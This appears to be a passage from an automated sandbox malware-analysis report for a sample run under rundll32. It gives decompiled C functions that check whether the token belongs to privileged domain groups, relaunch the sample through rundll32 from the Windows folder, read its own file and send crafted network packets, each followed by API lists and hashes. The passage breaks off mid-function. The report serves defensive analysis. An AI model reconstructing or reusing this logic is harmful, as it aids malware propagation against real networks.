                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				void** _t43;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
                                                                                                                                                                                        					GetLastError();
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					return _v16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
                                                                                                                                                                                        					L21:
                                                                                                                                                                                        					CloseHandle(_v12);
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(GetLastError() != 0x7a) {
                                                                                                                                                                                        					L20:
                                                                                                                                                                                        					goto L21;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t39 = GlobalAlloc(0x40, _v8);
                                                                                                                                                                                        				if(_t39 == 0) {
                                                                                                                                                                                        					GetLastError();
                                                                                                                                                                                        					L19:
                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
                                                                                                                                                                                        					GetLastError();
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        					GlobalFree(_t39);
                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                                        				if( *_t39 > 0) {
                                                                                                                                                                                        					_t11 = _t39 + 4; // 0x4
                                                                                                                                                                                        					_t43 = _t11;
                                                                                                                                                                                        					while(_v16 == 0) {
                                                                                                                                                                                        						_t31 = GetSidSubAuthorityCount( *_t43);
                                                                                                                                                                                        						if(_t31 != 0 &&  *_t31 >= 4) {
                                                                                                                                                                                        							_t32 = GetSidSubAuthority( *_t43, 4);
                                                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                                                        								_t33 =  *_t32;
                                                                                                                                                                                        								if(_t33 == 0x200 || _t33 == 0x207) {
                                                                                                                                                                                        									_v16 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t37 = _t37 + 1;
                                                                                                                                                                                        						_t43 =  &(_t43[2]);
                                                                                                                                                                                        						if(_t37 <  *_t39) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 007B8944
                                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 007B894B
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 007B896D
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B897E
                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 007B898F
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 007B89A8
                                                                                                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 007B89BF
                                                                                                                                                                                        • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 007B89D2
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B89FD
                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 007B8A00
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B8A08
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B8A0F
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B8A17
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1283781744-0
                                                                                                                                                                                        • Opcode ID: 3d003b0c232affa1dc696a149f2f1cd8680dc37fead985f80c56718d8c685b5a
                                                                                                                                                                                        • Instruction ID: 59d5e30bea6bc62fe5ccbd584860bb30e6511b167f7f7d829dd3451bfa3081b2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d003b0c232affa1dc696a149f2f1cd8680dc37fead985f80c56718d8c685b5a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 04314C35900219EBDF609BA4DD88FED7B7CEF04750F108265E501A2150EB79AE41DB6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E007B40E3(intOrPtr* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t54 = __ebx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t63 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                                                        				if(_t63 != 0) {
                                                                                                                                                                                        					 *_t63 = 0x12;
                                                                                                                                                                                        					 *((intOrPtr*)(_t63 + 0x1c)) = 0x48;
                                                                                                                                                                                        					if(1 !=  *__ebx) {
                                                                                                                                                                                        						 *(_t63 + 8) = 8;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						 *(_t63 + 8) = 4;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *(_t63 + 0x18) =  *(_t63 + 8);
                                                                                                                                                                                        					 *(_t63 + 0x20) =  *(_t54 + 0x54) & 0x000000ff;
                                                                                                                                                                                        					 *(_t63 + 0x25) =  *(_t63 + 0x18) + 1;
                                                                                                                                                                                        					_t43 = HeapAlloc(GetProcessHeap(), 8, 9);
                                                                                                                                                                                        					_v12 = _t43;
                                                                                                                                                                                        					if(_t43 != 0) {
                                                                                                                                                                                        						 *((intOrPtr*)(_t43 + 1)) = _a12;
                                                                                                                                                                                        						 *((intOrPtr*)(_t43 + 5)) = _a16;
                                                                                                                                                                                        						_t58 =  *(_t63 + 0x25) & 0x0000ffff;
                                                                                                                                                                                        						if(E007B3209( *(_t63 + 0x25) & 0x0000ffff, _a4, _a8,  *(_t54 + 0x30) & 0x0000ffff, _t63, _t43,  *(_t63 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                                                        							Sleep(0x7d0);
                                                                                                                                                                                        							_t20 =  &_a24; // 0x7b423d
                                                                                                                                                                                        							_t50 =  *_t20 & 0x0000ffff;
                                                                                                                                                                                        							 *(_t63 + 0x20) =  *(_t63 + 0x20) & 0x00000000;
                                                                                                                                                                                        							 *(_t63 + 8) = _t50;
                                                                                                                                                                                        							 *(_t63 + 0x18) = _t50;
                                                                                                                                                                                        							_t51 = _t50 + 1;
                                                                                                                                                                                        							 *(_t63 + 0x25) = _t50 + 1;
                                                                                                                                                                                        							if(E007B3209(_t58, _a4, _a8,  *(_t54 + 0x32) & 0x0000ffff, _t63, _a20, _t51) != 0) {
                                                                                                                                                                                        								Sleep(0x7d0);
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t63);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40F8
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40FB
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B4148
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B414B
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B4184
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=B{,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B41BC
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?), ref: 007B41CB
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41CE
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41D7
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41DA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreeSleep
                                                                                                                                                                                        • String ID: Uet0Xet$=B{
                                                                                                                                                                                        • API String ID: 1437939644-929814222
                                                                                                                                                                                        • Opcode ID: c85960aa95d85c9dd621b7c70744122817f4120dc08c21d3c7e545dfcc36d902
                                                                                                                                                                                        • Instruction ID: d78c56d14749094cc8735dbafbbdeff0adc0ffc0c856f737c79f86aadca670c7
                                                                                                                                                                                        • Opcode Fuzzy Hash: c85960aa95d85c9dd621b7c70744122817f4120dc08c21d3c7e545dfcc36d902
                                                                                                                                                                                        • Instruction Fuzzy Hash: 09316174800349AADB309F65CC09FAB7FF8FF49301F008549F9899A291E779D985DB64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B7BF7(intOrPtr _a12) {
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                        				struct _STARTUPINFOW _v88;
                                                                                                                                                                                        				short _v1648;
                                                                                                                                                                                        				short _v3208;
                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                        				char* _t20;
                                                                                                                                                                                        				char* _t21;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                        				long _t29;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t14 = GetSystemDirectoryW( &_v1648, 0x30c);
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					_t14 = lstrcatW( &_v1648, L"\\rundll32.exe");
                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                        						_t14 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
                                                                                                                                                                                        						if(_t14 != 0) {
                                                                                                                                                                                        							wsprintfW( &_v3208, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1648, PathFindFileNameW(0x7c7bc8), _a12);
                                                                                                                                                                                        							_t27 = 0x10;
                                                                                                                                                                                        							_t20 =  &_v20;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								 *_t20 = 0;
                                                                                                                                                                                        								_t20 = _t20 + 1;
                                                                                                                                                                                        								_t27 = _t27 - 1;
                                                                                                                                                                                        							} while (_t27 != 0);
                                                                                                                                                                                        							_t29 = 0x44;
                                                                                                                                                                                        							_t28 = _t29;
                                                                                                                                                                                        							_t21 =  &_v88;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								 *_t21 = 0;
                                                                                                                                                                                        								_t21 = _t21 + 1;
                                                                                                                                                                                        								_t28 = _t28 - 1;
                                                                                                                                                                                        							} while (_t28 != 0);
                                                                                                                                                                                        							_v88.cb = _t29;
                                                                                                                                                                                        							_t14 = CreateProcessW( &_v1648,  &_v3208, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                                                                                                        							ExitProcess(0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B7C0E
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 007B7C28
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(007C7BC8,0000030C), ref: 007B7C43
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(007C7BC8,?), ref: 007B7C51
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B7C6B
                                                                                                                                                                                        • CreateProcessW.KERNEL32 ref: 007B7CB3
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B7CBA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                                                                                                                                        • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                                                        • API String ID: 3592876439-3730106045
                                                                                                                                                                                        • Opcode ID: f477df7cb6aaad50a51f007a6eee45ba78045974c9c3ef8a091c13a52f550fe3
                                                                                                                                                                                        • Instruction ID: d4cca5b8af403517543f2e4c1be49f33eebcee62687e0647a99199e5fb25e105
                                                                                                                                                                                        • Opcode Fuzzy Hash: f477df7cb6aaad50a51f007a6eee45ba78045974c9c3ef8a091c13a52f550fe3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 931145B250011DAFDB259BA5CD48FEB7BBCAF45301F04826AF505E2151EA389E44CB74
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B8832() {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_t10 = CreateFileW(0x7c7bc8, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        				_v12 = _t10;
                                                                                                                                                                                        				if(_t10 != 0xffffffff) {
                                                                                                                                                                                        					_t25 = GetFileSize(_t10, 0);
                                                                                                                                                                                        					if(_t25 != 0) {
                                                                                                                                                                                        						_t21 = HeapAlloc(GetProcessHeap(), 0, _t25);
                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                        							if(ReadFile(_v12, _t21, _t25,  &_v8, 0) != 0 || _v8 != _t25) {
                                                                                                                                                                                        								 *0x7c3984 = _t21;
                                                                                                                                                                                        								 *0x7c7b94 = _t25;
                                                                                                                                                                                        								_v16 = 1;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(007C7BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007B884F
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 007B8860
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B886F
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B8876
                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 007B888F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B88A0
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B88A7
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B88C6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 3250796435-3175316637
                                                                                                                                                                                        • Opcode ID: 89500a4ef4df3523a4f125e715e21af11dd75fc53b095d670d42981e46624158
                                                                                                                                                                                        • Instruction ID: c5c47b33b5f7291e10531b68a7637067723369aadabe9e67822c603974bcb719
                                                                                                                                                                                        • Opcode Fuzzy Hash: 89500a4ef4df3523a4f125e715e21af11dd75fc53b095d670d42981e46624158
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E113AB0900244BBDB206BA5AC8CFEFBFBCEB89754F108259F411A2150EB788D41DA25
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E007B33A4(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed int _a24) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				long _t21;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = (_a24 & 0x0000ffff) + 0x37;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_v12 = _t21;
                                                                                                                                                                                        				_t35 = HeapAlloc(GetProcessHeap(), 8, _t21);
                                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                                        					_t38 = 9;
                                                                                                                                                                                        					_t27 = memcpy(_t35, _a8, _t38 << 2);
                                                                                                                                                                                        					__imp__#9(_v12 + 0xfffffffc, _t40, _t46);
                                                                                                                                                                                        					 *(_t35 + 2) = _t27;
                                                                                                                                                                                        					 *((short*)(_t35 + 0x22)) = _a12;
                                                                                                                                                                                        					 *((char*)(_t35 + 8)) = 0x26;
                                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                                        					_t15 = _t35 + 0x37; // 0x37
                                                                                                                                                                                        					asm("movsb");
                                                                                                                                                                                        					_t31 = memcpy(_t15, _a20, _a24 & 0x0000ffff);
                                                                                                                                                                                        					__imp__#19(_a4, _t35, _v12, 0);
                                                                                                                                                                                        					if(_t31 > 0) {
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3745,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B33BB
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B3745,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B33C2
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B33E1
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B3410
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B3421
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3434
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B343B
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 4260819906-3175316637
                                                                                                                                                                                        • Opcode ID: 02e97d3a0f276f91db86d69bb9ca70e9aafb8299b14fc0d80e4abb6b45cced77
                                                                                                                                                                                        • Instruction ID: 77ccb887af9f3656a37b6820749fe0d6fdf8e2a2694976248dd1b10663d81a28
                                                                                                                                                                                        • Opcode Fuzzy Hash: 02e97d3a0f276f91db86d69bb9ca70e9aafb8299b14fc0d80e4abb6b45cced77
                                                                                                                                                                                        • Instruction Fuzzy Hash: E9118BB6400289ABDB119FA4DC89FEB3BA8EF09310F048155FD009B252E7B9D945C775
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                        			E007B3209(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				long _t22;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t22 = (_a24 & 0x0000ffff) + 0x4b;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_v12 = _t22;
                                                                                                                                                                                        				_t37 = HeapAlloc(GetProcessHeap(), 8, _t22);
                                                                                                                                                                                        				if(_t37 != 0) {
                                                                                                                                                                                        					_t40 = 9;
                                                                                                                                                                                        					_t28 = memcpy(_t37, _a8, _t40 << 2);
                                                                                                                                                                                        					__imp__#9(_v12 + 0xfffffffc, _t44, _t52);
                                                                                                                                                                                        					 *(_t37 + 2) = _t28;
                                                                                                                                                                                        					 *((short*)(_t37 + 0x22)) = _a12;
                                                                                                                                                                                        					 *((char*)(_t37 + 8)) = 0xa1;
                                                                                                                                                                                        					_t13 = _t37 + 0x24; // 0x24
                                                                                                                                                                                        					_t31 = memcpy(_t13, _a16, 0 << 2);
                                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                                        					_t16 = _t37 + 0x4b; // 0x4b
                                                                                                                                                                                        					asm("movsb");
                                                                                                                                                                                        					_t33 = memcpy(_t16, _a20, _t31);
                                                                                                                                                                                        					__imp__#19(_a4, _t37, _v12, 0, 9);
                                                                                                                                                                                        					if(_t33 > 0) {
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t37);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B3220
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B3227
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B3246
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B3276
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B3287
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B329A
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B32A1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 4260819906-3175316637
                                                                                                                                                                                        • Opcode ID: 825da4ce8bf9f4f36e5d9f37711f713cdc68c71127bd8d7636e7c9fc0dfb6a62
                                                                                                                                                                                        • Instruction ID: 835212f07881d5215b7dcf5b6d786143d2004264764c09dba52649811257a2ac
                                                                                                                                                                                        • Opcode Fuzzy Hash: 825da4ce8bf9f4f36e5d9f37711f713cdc68c71127bd8d7636e7c9fc0dfb6a62
                                                                                                                                                                                        • Instruction Fuzzy Hash: FF116776500289ABDB109FA89C89FEB7BA8FB49324F048155FE009A292E779C905C764
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B4F43(short __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				signed int _t27;
